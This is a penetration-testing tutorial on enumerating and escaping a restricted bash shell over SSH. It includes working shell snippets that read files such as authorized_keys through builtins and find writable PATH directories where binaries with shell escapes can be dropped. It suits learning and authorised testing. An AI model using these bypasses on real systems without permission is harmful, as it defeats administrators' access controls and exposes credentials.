Restricted shells typically limit the capabilities of a standard shell. In the case of rbash, the following are disallowed or restricted
Using the cd command
Setting or unsetting the SHELL, PATH, HISTFILE, ENV and BASH_ENV variables
Running any command whose name contains a / character ( arguments may still contain slashes )
Output redirection using >, >|, <>, >&, &> and >>
Using the exec built-in to replace the current shell with another command
Using the enable built-in to enable or disable other shell built-ins
Turning off restricted mode with set +r or set +o restricted
Enumeration
General
Once we have established a connection to the target through SSH and see that we are dealing with some kind of restricted shell, we can run the following commands to get an idea of what we are up against
echo $0
echo $PATH
$0 tells us which shell we are in ( e.g. rbash ), and PATH tells us which directories hold the commands we are allowed to run, so we can list the available commands by retrieving the value of environment parameters such as PATH
Environment Parameters
We can run any of the following commands to retrieve the variables exported in the current restricted shell
env
printenv
export -p
declare -p
It would be interesting to modify the value of PATH or SHELL, but in rbash they are marked readonly and exported ( declare -p shows them as -rx ), so they cannot be changed
If the shell does not mark them readonly, simply set SHELL to a non-restricted shell, such as /bin/bash, or point PATH to a directory containing commands with known shell escapes
Listing Directory Content
If the ls command is not available, we can list the content of the current directory as follows
echo *
Bear in mind that in rbash the / restriction applies to command names, not to arguments, so passing another directory's path to echo still works; if the shell at hand rejects any argument containing /, we are limited to the current directory
However, there is a way to list the content of the current directory and child directories by enabling the globstar bash option using shopt
( shopt -s globstar ; echo ** )
We use a subshell ( ( <COMMAND> ) ) to avoid polluting the current environment
The initial focus should be on finding binaries that we can run to see if there are known shell escapes associated with them
Listing File Content
Commands such as cat, less, more, vi, nano, head, tail are typically forbidden, which makes it difficult ( nearly impossible 😅 ) to read the content of a given file
Command Substitution + Input Redirection
However, if command substitution is available ( rbash does not restrict it, and input redirection with < is not restricted either, only output redirection is ), we can proceed as follows
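The following is an added example, not code from the original page. It reads a file from inside a real restricted bash using only the echo and read builtins, combining command substitution with input redirection, and shows what rbash refuses in the same situation. The run_in_rbash helper and the sample file are assumptions made for the demo: the helper starts bash -r with PATH pointing at a non-existent directory so that no external binary resolves, which is the worst case of the scenario described above.

```shell
# Added example (not from the original page): reading a file inside rbash
# when cat, less, head, tail and friends are gone. rbash only blocks
# *output* redirection; input redirection '<' and command substitution still
# work, so the builtin echo can print a file's content.

BASH_BIN="$(command -v bash)"   # resolved up front, before PATH is clobbered

# Assumed helper for the demo: run a snippet in a restricted bash whose PATH
# holds no usable directory. $1 is the snippet, $2 becomes its $1.
run_in_rbash() {
    PATH=/nonexistent "$BASH_BIN" -r -c "$1" rbash "$2"
}

# Whole file in one go: command substitution + input redirection.
read_file_via_subst() {
    run_in_rbash 'echo "$(<"$1")"' "$1"
}

# Line by line with the read builtin, numbering lines. The '|| [ -n ... ]'
# keeps a final line that lacks a trailing newline.
read_file_via_loop() {
    run_in_rbash 'n=0; while IFS= read -r line || [ -n "$line" ]; do n=$((n+1)); echo "$n: $line"; done <"$1"' "$1"
}

# Exit status of a snippet run in rbash (printed, not returned, so it can be
# compared). Used to show what the restricted shell refuses.
rbash_status() {
    if run_in_rbash "$1" "$2" >/dev/null 2>&1; then echo 0; else echo $?; fi
}

# Constructed sample standing in for a target such as a private key or
# /etc/passwd. Written by the unrestricted outer shell, not by rbash.
SAMPLE="$(mktemp)"
printf 'line one\nline two\n' > "$SAMPLE"

read_file_via_subst "$SAMPLE"                                           # both lines
read_file_via_loop "$SAMPLE"                                            # "1: line one", "2: line two"
echo "cat exit status:      $(rbash_status 'cat "$1"' "$SAMPLE")"       # 127: no such command in PATH
echo "/bin/cat exit status: $(rbash_status '/bin/cat "$1"' "$SAMPLE")"  # 1: '/' in command name refused
echo "redirect exit status: $(rbash_status 'echo x > "$1"' "$SAMPLE")"  # 1: output redirection refused
rm -f "$SAMPLE"
```

On a target you would type only the inner snippets, e.g. echo "$(<.ssh/authorized_keys)", since the helper exists here only to reproduce the restricted environment locally.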
Let’s suppose that the PATH parameter has the following value
/home/john/rdir
Then, we would need to find a way to upload or create a file in that directory, so that we could run the given binary without specifying its absolute path, as it would be located within a PATH directory
This only applies if we have write permissions over the directory in question
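As an added example that is not part of the original page, the function below performs the two checks the enumeration above calls for using only shell builtins ( echo, [, set, for ): for every directory in PATH it reports whether we can write to it and which commands it contains. The PATH value is passed in as an argument rather than read from $PATH, and the directory it is run against is constructed for the demo; on a target you would feed it the value shown by echo $PATH.

```shell
# Added example (not from the original page): enumerate the PATH directories
# of a restricted shell using only builtins, so it also works where ls, find
# and stat are unavailable. In rbash the '/' restriction applies to command
# names, not arguments, so 'echo "$dir"/*' is allowed.

# Print one line per PATH entry: "<dir> writable=yes|no cmds=<entries>"
enum_path_dirs() {
    _old_ifs="$IFS"
    IFS=:
    set -- $1                        # split the PATH string on ':' into $1..$n
    IFS="$_old_ifs"
    for _dir in "$@"; do
        [ -n "$_dir" ] || _dir="."   # an empty entry means the current directory
        if [ -w "$_dir" ]; then _w=yes; else _w=no; fi
        _cmds=$(echo "$_dir"/*)
        # with no matches the glob stays literal, i.e. "<dir>/*"
        [ "$_cmds" = "$_dir/*" ] && _cmds="(empty)"
        echo "$_dir writable=$_w cmds=$_cmds"
    done
}

# Constructed stand-in for a PATH such as /home/john/rdir: a temporary
# directory holding one fake binary, followed by a directory that does not exist.
DEMO_DIR="$(mktemp -d)"
: > "$DEMO_DIR/tool"
enum_path_dirs "$DEMO_DIR:/nonexistent_rdir"
rm -rf "$DEMO_DIR"
```

A writable=yes entry is the directory to target for dropping a file; the cmds list is what to compare against the known shell escapes mentioned earlier.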
Bear in mind that rbash blocks output redirection, so the file cannot simply be written with >, and we could check if any of the following methods are possible